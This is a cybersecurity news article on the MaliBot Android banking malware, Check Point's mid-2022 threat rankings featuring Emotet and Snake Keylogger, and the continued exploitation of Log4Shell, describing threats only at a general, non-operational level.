MaliBot began to come to widespread attention in June 2022, and was discovered by F5 Labs researchers in the course of their work on FluBot. At the time, it was targeting mainly online banking customers in Italy and Spain, but its capabilities make it a relevant threat to Android users the world over.
Android users should be cautious as the MaliBot virus is becoming into a persistent and pervasive issue, warns Check Point. The most current monthly Global Threat Index from Check Point Research identifies the recently found Android malware MaliBot as one of the most pervasive risks to end users. It suddenly appeared over the past few weeks and has since surpassed AlienBot and Anubis to rank third among mobile malware threats, filling the void left by the removal of FluBot in May.
“While it’s always good to see law enforcement successful in bringing down cyber crime groups or malwares like FluBot, sadly it didn’t take long for a new mobile malware to take its place,” said Maya Horowitz, vice-president of research at Check Point Software.
According to F5, it disguises itself as a cryptocurrency mining app, but in fact steals financial information, credentials, crypto wallets and personal data. It is also capable of stealing and bypassing multifactor authentication (MFA) codes. Its command and control (C2) infrastructure is located in Russia, and it appears to have links to the Sality and Sova malware. It is distributed by luring victims to fraudulent websites that encourage them to download the malware, or by smishing, presenting victims with a QR code that leads to the malware APK.
Meanwhile, Emotet unsurprisingly retained the top spot as the most prevalent overall malware found in the wild, although Snake Keylogger – an infostealer – continues its meteoric rise, moving up to third having entered Check Point’s monthly chart in the number eight spot back in June. Having initially been spread via tainted PDF files, more recent Snake campaigns have seen it arrive in Word documents disguised as requests for quotations. Emotet also seems to be changing up its tactics, with a new variant reported last month that targets users of Google Chrome, and now includes credit card data theft.
“Cyber criminals are well aware of the central role that mobile devices play in many people’s lives and are always adapting and improving their tactics to match. The threat landscape is evolving rapidly, and mobile malware is a significant danger for both personal and enterprise security. It’s never been more important to have a robust mobile threat prevention solution in place.”
Once again, the top most exploited vulnerability in June 2022 was CVE-2021-44228 or Log4Shell, in Apache Log4j, which impacts 43% of worldwide organisations and exploitation of which shows no sign of slowing. In second place is an information disclosure vulnerability reported in Git Repository, and in third place, a series of URL directory traversal vulnerabilities on various web servers. More data on all of these is available from Check Point and can be accessed here.